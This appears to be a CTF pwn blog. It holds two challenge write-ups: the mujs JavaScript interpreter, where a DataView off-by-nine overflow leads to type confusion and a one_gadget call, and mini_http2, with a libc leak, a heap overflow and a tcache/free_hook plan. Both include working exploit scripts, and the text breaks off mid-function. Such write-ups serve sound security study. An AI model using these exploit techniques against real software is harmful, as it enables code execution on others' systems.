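64-bit, dynamically linked, all protections enabled

First download the MuJS source using the hash given by the challenge:

dd0a0972b4428771e6a3887da2210c7c9dd40f9c

Link: An embeddable Javascript interpreter in C
Run make debug to build a binary with symbols, and debugging can begin

Use the diff command to compare the source with the challenge files and find the targets that need analysis: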

➜  桌面 diff mujs susctf2022_mujs 
只在 susctf2022_mujs 存在：build # ignore
mujs/docs 和 susctf2022_mujs/docs 有共同的子目录
只在 mujs 存在：.gitattributes # ignore
只在 mujs 存在：.gitignore # ignore
diff --color mujs/jsbuiltin.c susctf2022_mujs/jsbuiltin.c
diff --color mujs/jsbuiltin.h susctf2022_mujs/jsbuiltin.h
diff --color mujs/jscompile.c susctf2022_mujs/jscompile.c
只在 susctf2022_mujs 存在：jsdataview.c # target
diff --color mujs/jsdump.c susctf2022_mujs/jsdump.c
diff --color mujs/jsgc.c susctf2022_mujs/jsgc.c
diff --color mujs/jsi.h susctf2022_mujs/jsi.h
diff --color mujs/jsobject.c susctf2022_mujs/jsobject.c
diff --color mujs/json.c susctf2022_mujs/json.c
diff --color mujs/jsstate.c susctf2022_mujs/jsstate.c
diff --color mujs/jsvalue.h susctf2022_mujs/jsvalue.h
diff --color mujs/main.c susctf2022_mujs/main.c
diff --color mujs/mujs.h susctf2022_mujs/mujs.h
diff --color mujs/one.c susctf2022_mujs/one.c
diff --color mujs/pp.c susctf2022_mujs/pp.c
diff --color mujs/regexp.c susctf2022_mujs/regexp.c
Common subdirectories: mujs/tools and susctf2022_mujs/tools

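All of the modules listed above differ to some degree; it is unclear whether that comes from a version mismatch or from deliberate changes to the source
jsdataview.c exists only in susctf2022_mujs, so that file is the first thing to analyze

Recovering symbols with BinDiff

Because the challenge ships its source, the BinDiff plugin for IDA can be used to carry symbols over from a build of that source

First build a binary with symbols from the challenge's code:

make debug

Then run the BinDiff plugin inside IDA:

Note: BinDiff does not support paths that contain Chinese characters

Select the symbols to recover and import them (normally functions with a similarity of 0.8 or higher are chosen, but for this challenge locating functions through strings is the better option)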

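JavaScript data types

Value types (primitives): String, Number, Boolean, Null, Undefined, Symbol

Reference types (objects): Object, Array, Function, RegExp, Date

Setting a variable to Null clears it
Undefined means the variable holds no value
An object is also a variable, but it can hold several values (several variables), each written as a name:value pair

var person = {firstName:"John", lastName:"Doe", age:50, eyeColor:"blue"};

Apart from primitive values, everything in JavaScript is an object: arrays are objects and functions are objects
As a result a single array can hold values of different types, including objects, functions and even other arrays: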

var myCars=new Array("Saab","Volvo","BMW");
var myArray=new Array();
myArray[0]=Date.now; // an object element (Date.now is itself a function object)
myArray[1]=myFunction; // a function
myArray[2]=myCars; // an array

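JavaScript type system

Two dimensions are commonly used to describe a programming language:

Strong versus weak typing, which classifies languages by type safety
Static versus dynamic typing, which classifies languages by when types are checked

Strong typing: the language itself requires the type of each argument to match the type of the corresponding parameter

Weak typing: the language places no restriction on argument types

The following example contrasts strongly typed Java with weakly typed JavaScript: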

// Java (strongly typed)
class Main {
    // The parameter is declared as int, so the argument must be an int as well
    static void foo(int num) {
        System.out.println(num);
    }
    
    public static void main(String[] args) {
        // An int argument compiles; any other type is rejected by the compiler
        Main.foo(100); // ok
        Main.foo("100"); // error: "100" is a String
        Main.foo(Integer.parseInt("100")); // ok
    }
}

// JavaScript (weakly typed)
function foo(num) {
    // No type is declared for the parameter, so an argument of any type is accepted
    console.log(num)
}

foo(100) // ok
foo('100') // ok
foo(parseInt('100')) // ok

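Strongly typed languages allow few or no implicit type conversions, whereas weakly typed languages allow values to be converted implicitly almost anywhere

Static typing: the type of a variable is fixed when it is declared and cannot be changed afterwards

Dynamic typing: the type of a variable is only known at run time and may change at any moment. In a dynamically typed language the variable itself has no type; the value stored in it does

Here is an example: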

// Java (statically typed)
class Main {
    public static void main(String[] args) {
        // num is declared as int up front and cannot be changed to a String
        int num = 100;
        num = 50; // ok
        num = "100"; // error
        System.out.println(num);
    }
}

// JavaScript (dynamically typed)
var num = 100
// the type held by num can be changed freely
num = 50 // ok
num = '100' // ok
num = true // ok
console.log(num)

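JavaScript is a weakly and dynamically typed language

Reference: JavaScript type system

JavaScript constructors

Sometimes we need a "blueprint" for creating many objects of the same "type" (similar to a struct in C)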

function Person(first, last, age, eye) {
    this.firstName = first;
    this.lastName = last;
    this.age = age;
    this.eyeColor = eye;
}

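In JavaScript, the thing called this is the "owner" of the code
Inside a constructor function this has no value of its own; it stands in for the new object, and when a new object is created this becomes that object (somewhat like self in Python)

An "object type" is created with an object constructor function; in the example above, Person() is the object constructor function

Calling the constructor function with the new keyword creates objects of the same type:

var myFather = new Person("Bill", "Gates", 62, "blue");
var myMother = new Person("Steve", "Jobs", 56, "green");

Methods can also be defined inside a constructor function: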

function Person(firstName, lastName, age, eyeColor) {
    this.firstName = firstName;  
    this.lastName = lastName;
    this.age = age;
    this.eyeColor = eyeColor;
    this.changeName = function (name) {
        this.lastName = name;
    };
}

var myFriend = new Person("Bill", "Gates", 62, "blue");
myFriend.changeName("Jobs");

By substituting myFriend for this, JavaScript knows which person is being operated on

Wasted resources in constructors:

function Person(firstName, lastName, age, eyeColor) {
    this.firstName = firstName;  
    this.lastName = lastName;
    this.age = age;
    this.eyeColor = eyeColor;
    this.changeName = function (name) {
        this.lastName = name;
    };
}

let p1 = new Person('yhellow','chunk',99,'red')
let p2 = new Person('yhellow','chunk',99,'red')
console.log(p1.changeName == p2.changeName) // false

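The instances p1 and p2 have identical contents, yet their method properties are different objects
The function keyword has to allocate space on the heap for the function and then returns the address of that space
With two instances p1 and p2, the very same function is therefore stored twice, which wastes resources

Common workarounds:

Use a global function: turn the function into a global one and assign its address inside the constructor, but this pollutes the global namespace
Use an object: group those global functions under one dedicated object so that they become properties of that object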

let obj = {
    fn1: function(){
        console.log('chunk1')
    },
    fn2: function(){
        console.log('chunk2')
    },
    fn3: function(){
        console.log('chunk3')
    },
}

function Person(firstName, lastName, age, eyeColor) {
    this.firstName = firstName;  
    this.lastName = lastName;
    this.age = age;
    this.eyeColor = eyeColor;
    this.fun1 =obj.fn1
    this.fun2 =obj.fn2
    this.fun3 =obj.fn3
}

let p1 = new Person('yhellow','chunk',99,'red')
let p2 = new Person('yhellow','chunk',99,'red')
console.log(p1.fun1 == p2.fun1) // true

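This approach avoids the waste and keeps the individual functions out of the global namespace, but obj itself is still a global
To solve this, JavaScript creates a prototype object for every constructor, and that prototype object can play the same role as obj above
PS: strictly speaking, prototype is a property of the constructor; the value of that property is the prototype object

JavaScript prototype objects

In JavaScript every constructor (function) has a built-in property named prototype. It is called the prototype, it is itself an object, and we refer to it as the prototype object

In Chrome, press Ctrl+Shift+J to open the console, create an object and inspect its properties:

The object has a [[prototype]] property that points to its prototype object, String

Expanding [[prototype]] shows that it has a [[prototype]] property of its own, pointing to the prototype object of String, which is Object

This makes things clear: every object has an internal [[prototype]] link that points to its prototype object (the chain ends at Object, because Object is the base of all objects), and every JavaScript object inherits properties and methods from a prototype object:

Date objects inherit from Date.prototype
Array objects inherit from Array.prototype
Person objects inherit from Person.prototype
All objects in JavaScript are instances of Object, which sits at the top of the prototype chain

If the example above uses the prototype object instead of the global object obj, the code looks like this: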

function Person(firstName, lastName, age, eyeColor) {
    this.firstName = firstName;  
    this.lastName = lastName;
    this.age = age;
    this.eyeColor = eyeColor;
}

Person.prototype.fun1 = function(){
    console.log('chunk1')
}
Person.prototype.fun2 = function(){
    console.log('chunk2')
}
Person.prototype.fun3 = function(){
    console.log('chunk3')
}

let p1 = new Person('yhellow','chunk',99,'red')
let p2 = new Person('yhellow','chunk',99,'red')
console.log(p1.fun1 == p2.fun1) // true

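Printing p1 gives the following:

fun1, fun2 and fun3 all live in [[prototype]] (Person.prototype) and are inherited by every Person instance

What JavaScript does when it runs new on a constructor:

Create an empty object
Point the prototype of the empty object at the prototype of the constructor (inherit from the function's prototype)
Add the properties and methods to this object (bind this to the new object while the constructor runs)
Inspect the constructor's return value (a returned primitive is ignored; only a returned reference type is used)

Example: the following code simulates new and produces the same result: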

function Fun(age,name){
    this.age = age;
    this.name = name;
}

function create(fn, ...args){
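    var obj = {}; // create an empty object
    Object.setPrototypeOf(obj,fn.prototype) // point the empty object's prototype at the constructor's prototype
    var result = fn.apply(obj,args); // add the properties and methods to this object
    return result instanceof Object ? result : obj; // inspect the constructor's return value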
}

console.log(new Fun(18,'yhellow'))
console.log(create(Fun,18,'yhellow'))

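DataView

A DataView is a low-level interface for reading and writing multiple numeric types in an ArrayBuffer, without having to care about the platform's byte order

new DataView(buffer [, byteOffset [, byteLength]])

buffer: an ArrayBuffer or SharedArrayBuffer object that backs the DataView
byteOffset: optional; offset within buffer of the first byte of this DataView, defaulting to the first byte of the buffer
byteLength: optional; length of this DataView in bytes, defaulting to the length of buffer

PS: it later turned out that the DataView in this challenge has little to do with the standard DataView; it is more like a plugin the author wrote for mujs, with entirely custom internal logic

Reference: DataView (DataView) - JavaScript Chinese developer manual

Vulnerability analysis

The code base is fairly large, but diff shows that jsdataview.c exists only in the challenge, so the bug is very likely there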

static void Dv_setUint8(js_State *J)
{
	js_Object *self = js_toobject(J, 0);
	if (self->type != JS_CDATAVIEW) js_typeerror(J, "not an DataView");
	size_t index = js_tonumber(J, 1);
	uint8_t value = js_tonumber(J, 2);
	if (index < self->u.dataview.length+0x9) { /* target */
		self->u.dataview.data[index] = value;
	} else {
		js_error(J, "out of bounds access on DataView");
	}
}

static void Dv_getUint32(js_State *J)
{
	js_Object *self = js_toobject(J, 0);
	if (self->type != JS_CDATAVIEW) js_typeerror(J, "not an DataView");
	size_t index = js_tonumber(J, 1);
	if (index+3 < self->u.dataview.length) { /* target */
		js_pushnumber(J, *(uint32_t*)&self->u.dataview.data[index]);
	} else {
		js_pushundefined(J);
	}
}

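setUintN stores an unsigned N-bit integer at the given position
getUintN reads the unsigned N-bit integer stored at the given position

The bugs are fairly obvious:

Dv_setUint8 can write up to 9 bytes past the end of the buffer (the check is index < length+0x9)
Dv_getUint32 can read up to 3 bytes before the start of the buffer (index+3 wraps around for a negative index)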
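
The two checks can be replayed outside the interpreter. The following is only a sketch in Python, not code from the challenge: it assumes a 64-bit size_t and assumes that a negative JavaScript number ends up as a wrapped-around size_t (in C that conversion is undefined behaviour, so this mirrors what typical x86-64 builds do). The helper names are made up for illustration.

```python
MASK64 = (1 << 64) - 1  # assumption: size_t is 64 bits wide (x86-64)

def set_uint8_allowed(index: int, length: int) -> bool:
    """Mirror of the check in Dv_setUint8: index < length + 0x9."""
    return (index & MASK64) < length + 0x9

def get_uint32_allowed(index: int, length: int) -> bool:
    """Mirror of the check in Dv_getUint32: index + 3 < length, in size_t arithmetic."""
    return ((index + 3) & MASK64) < length

length = 0x48
# Highest index that setUint8 accepts: length + 8, i.e. 9 bytes past the last valid index.
highest_write = max(i for i in range(length + 0x20) if set_uint8_allowed(i, length))
# Negative indices for which index + 3 wraps back into range pass the getUint32 check.
negative_reads = [i for i in range(-8, 0) if get_uint32_allowed(i, length)]
print(hex(highest_write), negative_reads)
```

Only the write primitive is used by the exploit further down; the read-side wraparound is listed for completeness.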

To actually exploit these bugs, however, the functionality of the program has to be understood first:

void jsB_initdataview(js_State *J)
{
	js_pushobject(J, J->DataView_prototype);
	{
		jsB_propf(J, "DataView.prototype.getUint8", Dv_getUint8, 1);
		jsB_propf(J, "DataView.prototype.setUint8", Dv_setUint8, 2);
		jsB_propf(J, "DataView.prototype.getUint16", Dv_getUint16, 1);
		jsB_propf(J, "DataView.prototype.setUint16", Dv_setUint16, 2);
		jsB_propf(J, "DataView.prototype.getUint32", Dv_getUint32, 1);
		jsB_propf(J, "DataView.prototype.setUint32", Dv_setUint32, 2);
		jsB_propf(J, "DataView.prototype.getLength", Dv_getLength, 0);
	}
	js_newcconstructor(J, jsB_new_DataView, jsB_new_DataView, "DataView", 0);
	js_defglobal(J, "DataView", JS_DONTENUM);
}

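This works like "registering functions": it binds JavaScript-level function names to the C functions that implement them
It also installs jsB_new_DataView as the constructor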

static void jsB_new_DataView(js_State *J) {
	int top = js_gettop(J);
	size_t size;

	if (top != 2) {
		js_typeerror(J, "new DataView expects a size");
	}
	size = js_tonumber(J, 1);

	js_Object *obj = jsV_newobject(J, JS_CDATAVIEW, J->DataView_prototype);
	obj->u.dataview.data = js_malloc(J, size);
	memset(obj->u.dataview.data, 0, size);
	obj->u.dataview.length = size;
	js_pushobject(J, obj);
}

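It creates a js_Object structure, and js_malloc allocates a heap chunk for the data

Type confusion + heap feng shui

First look at the contents of the js_Object structure: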

struct js_Object
{
	enum js_Class type;
	int extensible;
	js_Property *properties;
	int count; /* number of properties, for array sparseness check */
	js_Object *prototype;
	union {
		int boolean;
		double number;
		struct {
			const char *string;
			int length;
		} s;
		struct {
			int length;
		} a;
		struct {
			js_Function *function;
			js_Environment *scope;
		} f;
		struct {
			const char *name;
			js_CFunction function;
			js_CFunction constructor;
			int length;
			void *data;
			js_Finalize finalize;
		} c;
		js_Regexp r;
		struct {
			js_Object *target;
			js_Iterator *head;
		} iter;
		struct {
			const char *tag;
			void *data;
			js_HasProperty has;
			js_Put put;
			js_Delete delete;
			js_Finalize finalize;
		} user;
		struct {
		    uint32_t length;
		    uint8_t* data;
		} dataview;
	} u;
	js_Object *gcnext; /* allocation list */
	js_Object *gcroot; /* scan list */
	int gcmark;
};

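The first byte of a js_Object can be overwritten, and that byte holds the type of the object
So heap feng shui is needed to place the overflowable dataview.data chunk directly in front of a js_Object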
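
Why a 0x48-byte DataView is used can be checked with a little chunk arithmetic. This is a sketch that assumes the usual glibc malloc layout on x86-64 (8-byte size field, 16-byte alignment, and the next chunk's prev_size field being usable as data); the function names are illustrative and not from the challenge.

```python
SIZE_SZ = 8        # assumption: sizeof(size_t) on x86-64
MALLOC_ALIGN = 16  # assumption: glibc MALLOC_ALIGNMENT on x86-64
MIN_CHUNK = 0x20   # smallest chunk glibc hands out on x86-64

def chunk_size(request: int) -> int:
    """Chunk size (header included) that glibc picks for a malloc(request)."""
    size = (request + SIZE_SZ + MALLOC_ALIGN - 1) & ~(MALLOC_ALIGN - 1)
    return max(size, MIN_CHUNK)

def offset_to_next_user_data(request: int) -> int:
    """Distance from this chunk's user pointer to the next chunk's user pointer."""
    return chunk_size(request)

def reaches_next_type_field(request: int) -> bool:
    """True if the highest index Dv_setUint8 accepts (length + 8) hits the next chunk's first user byte."""
    return request + 8 >= offset_to_next_user_data(request)

for request in (0x40, 0x48, 0x68):
    print(hex(request), hex(chunk_size(request)), reaches_next_type_field(request))
```

Under these assumptions only request sizes that end in 8 (0x48, 0x68, ...) let the 9-byte overflow reach the type field of an adjacent js_Object, which is consistent with the b.setUint8(0x48+8, ...) calls in the exploit.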

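Before that, walk through the flow of the program:

main: most built-in functions are commented out and only print is left; control is handed to js_dofile
js_dofile: calls js_loadfile to set up the stack, then calls js_call to run the code
js_call: fetches obj from the stack; this obj is the function to call, and execution finally enters jsR_run
jsR_run: fetches and executes opcodes; C-level code is invoked through jsR_callcfunction

Test case: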

b = DataView(0x68);
a = DataView(0x48);
b = DataView(0x48);
c = DataView(0x48);
e = DataView(0x48);
f = DataView(0x1000 * 0x1000);
/* jsB_new_DataView:0x555555571870 */
/* Dv_setUint8:0x555555577680 */

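The heap is messy the first time jsB_new_DataView runs, because jsB_init initializes all the built-in types, leaving many free chunks and tcache entries on the heap that disturb later allocations
PS: BinDiff does not identify jsB_new_DataView reliably, so locating the function through strings is recommended here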

Allocated chunk | PREV_INUSE
Addr: 0x5555555c2af0 /* dataview.data */ 
Size: 0x51

Allocated chunk | PREV_INUSE
Addr: 0x5555555c2b40 /* js_Object */
Size: 0x71

pwndbg> telescope 0x5555555c2b40
00:0000│  0x5555555c2b40 ◂— 0x0
01:0008│  0x5555555c2b48 ◂— 0x71 /* 'q' */
02:0010│  0x5555555c2b50 ◂— 0x100000010 /* type:dataview */
03:0018│  0x5555555c2b58 —▸ 0x55555559b0a0 —▸ 0x555555585089 ◂— 0x6d6172676f727000
04:0020│  0x5555555c2b60 ◂— 0x0
05:0028│  0x5555555c2b68 —▸ 0x5555555a5780 ◂— 0x100000010
06:0030│  0x5555555c2b70 ◂— 0x48 /* length */
07:0038│  0x5555555c2b78 —▸ 0x5555555c2bc0 ◂— 0x0

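The bug can be used to modify js_Object->type, which leads to type confusion
The core idea: use another member of the js_Object union that occupies the same memory to overwrite js_Object.u.dataview.length, which yields a much larger heap overflow
In the union, js_Object.u.dataview.length, js_Object.u.c.name and js_Object.u.number share the same location (because the pointer must be 8-byte aligned, dataview.length effectively takes up 8 bytes in the union, so there is no risk of clobbering the dataview.data that follows)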

static void js_setdate(js_State *J, int idx, double t)
{
        js_Object *self = js_toobject(J, idx);
        if (self->type != JS_CDATE)
                js_typeerror(J, "not a date");
        self->u.number = TimeClip(t);
        js_pushnumber(J, self->u.number);
}

static void Dp_setTime(js_State *J)
{
        js_setdate(J, 0, js_tonumber(J, 1));
}

setTime can modify js_Object.u.number, so we change the dataview into a date, call setTime, and then change it back:

b.setUint8(0x48+8, 10); // set c type to Date
Date.prototype.setTime.bind(c)(1.09522e+12) // write number + length
/* c.setTime(0) */
b.setUint8(0x48+8, 16); // set c type back to DataView
print(c.getLength())

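c.setTime(0) cannot be called directly here: the prototype of an object is fixed at the moment it is created, so changing type does not change prototype
And it is the prototype that largely determines which methods can be called on the object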

pwndbg> telescope 0x5555555c2b40
00:0000│  0x5555555c2b40 ◂— 0x0
01:0008│  0x5555555c2b48 ◂— 0x71 /* 'q' */
02:0010│  0x5555555c2b50 ◂— 0x10000000a /* type:date */
03:0018│  0x5555555c2b58 —▸ 0x55555559b0a0 —▸ 0x555555585089 ◂— 0x6d6172676f727000
04:0020│  0x5555555c2b60 ◂— 0x0
05:0028│  0x5555555c2b68 —▸ 0x5555555a5780 ◂— 0x100000010
06:0030│  0x5555555c2b70 ◂— 0x426fe0065ea00000 /* length */
07:0038│  0x5555555c2b78 —▸ 0x5555555c2bc0 ◂— 0x0
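
The value in the dump above can be cross-checked offline. A minimal sketch, assuming the little-endian x86-64 layout in which u.number (a double) and u.dataview.length (a uint32_t) both start at offset 0 of the union; the helper name is invented for this example.

```python
import struct

def dataview_length_after_settime(t: float) -> int:
    """Low 32 bits of the IEEE-754 encoding of t, i.e. what u.dataview.length reads back."""
    raw = struct.pack("<d", t)                   # the 8 bytes written through u.number
    (length,) = struct.unpack_from("<I", raw, 0)  # the first 4 bytes read through u.dataview.length
    return length

raw_qword = int.from_bytes(struct.pack("<d", 1.09522e+12), "little")
new_length = dataview_length_after_settime(1.09522e+12)
print(hex(raw_qword), hex(new_length))
```

With the constant from the exploit this gives the same quadword as the telescope output, and a length of 0x5ea00000, far larger than the 0x48 bytes that were actually allocated.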

After this, libc_base can be leaked
Finally, change the type of one of the dataview objects to JS_CCFUNCTION (enum value 4); js_call will then call the function pointer obj->u.c.function:

void js_call(js_State *J, int n)
{
	js_Object *obj;
	int savebot;

    ......
        
	} else if (obj->type == JS_CCFUNCTION) {
		jsR_pushtrace(J, obj->u.c.name, "native", 0);
		jsR_callcfunction(J, n, obj->u.c.length, obj->u.c.function);
		--J->tracetop;
	}

	BOT = savebot;
}

Overwriting this pointer with a one_gadget is enough

Full exp:

b = DataView(0x68);
a = DataView(0x48);
b = DataView(0x48);
c = DataView(0x48);
e = DataView(0x48);
f = DataView(0x1000 * 0x1000);

b.setUint8(0x48+8, 10); // set c type to Date
Date.prototype.setTime.bind(c)(1.09522e+12) // write number + length
b.setUint8(0x48+8, 16); // set c type back to DataView
print(c.getLength())

sh32 = 4294967296 // 1<<32
libb_addr_off = 472
libc_leak = c.getUint32(libb_addr_off) + (c.getUint32(libb_addr_off+4)*sh32)

libc_off = 0x7ffff7c31000 - 0x7ffff6bfe010 // got this from gdb
libc_base = libc_leak + libc_off
print('libc base:', libc_base.toString(16))

one_gag = libc_base + 0xe6af4
print('onegadget:', one_gag.toString(16))

e_obj_off = 192
c.setUint8(160, 4) // this sets type to JS_CCFUNCTION

// set lower 4 bytes of js_CFunction function
c.setUint32(e_obj_off+8, one_gag&0xffffffff) 

// set upper 4 bytes of js_CFunction function
c.setUint32(e_obj_off+8+4, Math.floor(one_gag/sh32)&0xffffffff) 
e() // e is now a function so we can call it
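
The exploit reads and writes 64-bit pointers as two 32-bit halves and combines them with a multiplication by 1<<32, because JavaScript numbers are doubles and its bitwise operators only work on 32 bits. The same arithmetic, sketched in Python with illustrative helper names (the sample address is simply the libc base from the gdb comment plus the one_gadget offset used above):

```python
SH32 = 1 << 32  # same constant as sh32 in the exploit

def join_u32(lo: int, hi: int) -> int:
    """Rebuild a 64-bit value from two 32-bit reads, as done for libc_leak."""
    return lo + hi * SH32

def split_u64(value: int) -> tuple[int, int]:
    """Split a 64-bit value into (low, high) 32-bit halves for two setUint32 writes."""
    return value % SH32, value // SH32

one_gadget = 0x7ffff7c31000 + 0xe6af4
lo, hi = split_u64(one_gadget)
print(hex(lo), hex(hi), hex(join_u32(lo, hi)))
```

User-space addresses on x86-64 fit in 47 bits, well below the 53 bits a double represents exactly, which is why this arithmetic loses no precision in the interpreter.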

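Summary:

This is probably the first JavaScript interpreter challenge I have reproduced (after putting it off for a long time). When I first met this kind of challenge I could not make sense of the heap feng shui at all, so I shelved it…

Later I set breakpoints in every function that might allocate memory and debugged a write-up from the web for a while before the heap feng shui started to make sense. It still feels impossible to fully control heap allocation in this kind of challenge (especially without symbols, which makes debugging and reversing much harder), so exploring the heap layout comes down to trial and error (I am not good enough yet to have a better method)

In the end I learned a type confusion technique; it feels fairly formulaic, and once the heap feng shui is right the rest is not a big problem

Heap overflow + Tcache Attack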

Posted on 2022-09-30 Edited on 2022-12-19 In Pwn train 14k 13 mins.

mini_http2

GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.1) stable release version 2.35

pwn: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /home/yhellow/tools/glibc-all-in-one/libs/2.35-0ubuntu3.1_amd64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=f44285458d02382631cf8f9747971f71a6b36211, stripped
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

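64-bit, all protections enabled

Program logic

libc_base can be leaked through the following call chain:

main -> pwn -> protocol_fun -> ops -> login_fun -> snprintf

snprintf(v8, 0x1000uLL, "{'msg': 'login successful!','status': 1,'gift': \"%p\"}", &strstr);// leaks a libc address

PS: the function names are all ones I made up, so bear with them

According to the program logic, register_fun has to run before login_fun; its call chain is:

main -> pwn -> protocol_fun -> ops -> register_fun

Both functions are driven by a protocol string (which includes the url) and perform many checks on it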

register_fun：

name = strstr(a1, "username=");
pwd = strstr(a1, "password=");
if ( !name || !pwd ) /* the protocol must contain both username and password */
	output("Invalid argv");
name_last = strchr(name, '&');
if ( !name_last ) /* used to compute the length of name */
	name_last = &name[strlen(name)];
pwd_last = strchr(pwd, '&');
if ( !pwd_last ) /* used to compute the length of pwd */
	pwd_last = &pwd[strlen(pwd)];
name_chunk = malloc(name_last - name - 1);
memset(name_chunk, 0, name_last - name - 1);
memcpy(name_chunk, name + 9, name_last - name - 9);
pwd_chunk = malloc(pwd_last - pwd - 1);
memset(pwd_chunk, 0, pwd_last - pwd - 1);
memcpy(pwd_chunk, pwd + 9, pwd_last - pwd - 9);
if ( name_st )
    free(name_st);
if ( pwd_st )
    free(pwd_st);
name_st = (char *)name_chunk; /* store name_chunk in the global name_st */
pwd_st = (char *)pwd_chunk; /* store pwd_chunk in the global pwd_st */
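
The pointer arithmetic in register_fun is easier to follow when replayed on a concrete request. The sketch below is a Python model of the decompiled logic only (the function name extract_field is invented here): it returns the bytes that memcpy copies together with the size passed to malloc.

```python
def extract_field(query: bytes, key: bytes):
    """Model of the strstr/strchr logic: returns (copied value, malloc size) or None."""
    start = query.find(key)        # strstr(a1, "username=")
    if start < 0:
        return None
    end = query.find(b"&", start)  # strchr(name, '&')
    if end < 0:
        end = len(query)           # name_last = &name[strlen(name)]
    alloc_size = end - start - 1   # malloc(name_last - name - 1)
    value = query[start + len(key):end]  # memcpy(chunk, name + 9, name_last - name - 9)
    return value, alloc_size

url = b"/register?username=123&password=123"
print(extract_field(url, b"username="), extract_field(url, b"password="))
```

In this model the allocation is always 8 bytes larger than the copied value, so the copy in register_fun itself stays inside the chunk.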

login_fun：

name = strstr(a1, "username=");
pwd = strstr(a1, "password=");
if ( !login_key )
{
    if ( !name || !pwd ) /* the protocol must contain both username and password */
        output("Invalid argv");
    name_last = strchr(name, '&');
    if ( !name_last ) /* used to compute the length of name */
        name_last = &name[strlen(name)];
    pwd_last = strchr(pwd, '&');
    if ( !pwd_last ) /* used to compute the length of pwd */
        pwd_last = &pwd[strlen(pwd)];
    name_chunk = malloc(name_last - name - 1);
    memset(name_chunk, 0, name_last - name - 1);
    memcpy(name_chunk, name + 9, name_last - name - 9);
    pwd_chunk = (char *)malloc(pwd_last - pwd - 1);
    memset(pwd_chunk, 0, pwd_last - pwd - 1);
    memcpy(pwd_chunk, pwd + 9, pwd_last - pwd - 9);
    if ( !strcmp(name_st, (const char *)name_chunk) && !strcmp(pwd_st, pwd_chunk))
        /* compares the globals name_st/pwd_st with the freshly parsed name_chunk/pwd_chunk (the result does not matter for the leak) */
        login_key = 1;
    free(name_chunk);
    free(pwd_chunk);
    memset(v8, 0, 0x1000uLL);
    snprintf(v8, 0x1000uLL, "{'msg': 'login successful!','status': 1,'gift': \"%p\"}", &strstr); /* leaks a libc address */
}

The leak script is as follows:

def login():
    size_protocol = "\x00" + "\x00" + "\x27"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)

    size_url = "\x00" + "\x00" + "\x00" + "\x20"
    ops_cmd = "/login?"
    name = "username=" + "123"
    pwd = "&password=" + "123"
    url = ops_cmd + name + pwd
    protocol = "\x82" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

def register():
    size_protocol = "\x00" + "\x00" + "\x2a"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)
 
    size_url = "\x00" + "\x00" + "\x00" + "\x23"
    ops_cmd = "/register?"
    name = "username=" + "123"
    pwd = "&password=" + "123"
    url = ops_cmd + name + pwd
    protocol = "\x82" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

register()
login()
p.recvuntil("gift': \"")
leak_addr = int(p.recvuntil("\"")[:-1], 16)  # %p prints a 0x-prefixed hex address
libc_base = leak_addr - 0xc4200

success("leak_addr >> " + hex(leak_addr))
success("libc_base >> " + hex(libc_base))
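
The hard-coded length bytes in login() and register() follow a simple pattern, so they can be computed instead of typed by hand. The sketch below infers the framing purely from the script above (a 3-byte big-endian payload length, a type byte 0x01, a flags byte 0x05, zero padding to 9 bytes, then three fixed bytes, a 4-byte big-endian URL length and the URL); the field names and the helper build_url_request are assumptions made for illustration, not something taken from the binary.

```python
import struct

FRAME_TYPE = 0x01          # type byte used by the script above
FRAME_FLAGS = 0x05         # flags byte used by the script above
PREFIX = b"\x82\x86\x44"   # three bytes sent before the URL length in login()/register()

def build_url_request(url: bytes, prefix: bytes = PREFIX):
    """Return (9-byte header, payload) with both length fields derived from the URL."""
    payload = prefix + struct.pack(">I", len(url)) + url
    header = len(payload).to_bytes(3, "big") + bytes([FRAME_TYPE, FRAME_FLAGS])
    return header.ljust(9, b"\x00"), payload

header, payload = build_url_request(b"/login?username=123&password=123")
print(header.hex(), len(payload))
```

For the login URL this reproduces the 0x27 and 0x20 constants of the script; a caller would send the header and then the payload, exactly as p.send(cmd) and p.send(protocol) do.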

The program also provides several functions that operate on the heap:

void __fastcall api(char *url, char *strs)
{
    if ( !strcmp(url, "/api/add_worker") )
    {
        add_worker(url, strs);
    }
    else if ( !strcmp(url, "/api/del_worker") )
    {
        del_worker(url, strs);
    }
    else if ( !strcmp(url, "/api/show_worker") )
    {
        show_worker(url, strs);
    }
    else if ( !strcmp(url, "/api/edit_worker") )
    {
        edit_worker(url, strs);
    }
}

Vulnerability analysis

len_name = strlen(name[4]);
memcpy(list[worker_num].name_addr_list, name[4], len_name); /* heap overflow */
name_addr_list = list[worker_num].name_addr_list;
name_addr_list[strlen(name[4])] = 0;
list[worker_num].name_len_list = strlen(name[4]);
len_desc = strlen(desc[4]);
memcpy(list[worker_num].desc_addr_list, desc[4], len_desc); /* heap overflow */
desc_addr_list = list[worker_num].desc_addr_list;
desc_addr_list[strlen(desc[4])] = 0;
list[worker_num].desc_len_list = strlen(desc[4]);

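edit_worker contains a heap overflow: the new name and desc are copied with their own strlen, without checking the size of the existing chunks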

void __noreturn exit_s()
{
  if ( *function )
  {
    if ( name_st )
      ((void (__fastcall *)(char *))*function)(name_st);
  }
  puts("goodbye!");
  exit(0);
}

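exit_s calls through a function pointer, which is in fact free_hook

pwndbg> telescope 0x55dc824e1000+0xD0A0
00:0000│ 0x55dc824ee0a0 —▸ 0x7f1130a994a8 (__free_hook) —▸ 0x7f11308c9d60 (system) ◂— endbr64

Since glibc 2.34 the hooks free_hook, malloc_hook and realloc_hook have been removed from the API
The symbols are still present in this libc-2.35 for compatibility, but free, malloc and realloc no longer call them

This challenge, however, provides its own function pointer that calls free_hook, so the traditional free_hook hijack still works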

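Exploitation plan

We have a heap overflow, plus leaked libc_base and heap_base

The simplest approach is a tcache attack (with heap_base known, the key that masks the fd pointer can be forged)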
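
As background for why heap_base is needed: since glibc 2.32 the fd pointer of a tcache entry is stored mangled (safe-linking), XORed with the address of the fd field shifted right by 12 bits. A minimal sketch of that mangling follows; the helper names mirror glibc's PROTECT_PTR and REVEAL_PTR macros, and the addresses are made-up sample values rather than ones from a real run.

```python
def protect_ptr(pos: int, ptr: int) -> int:
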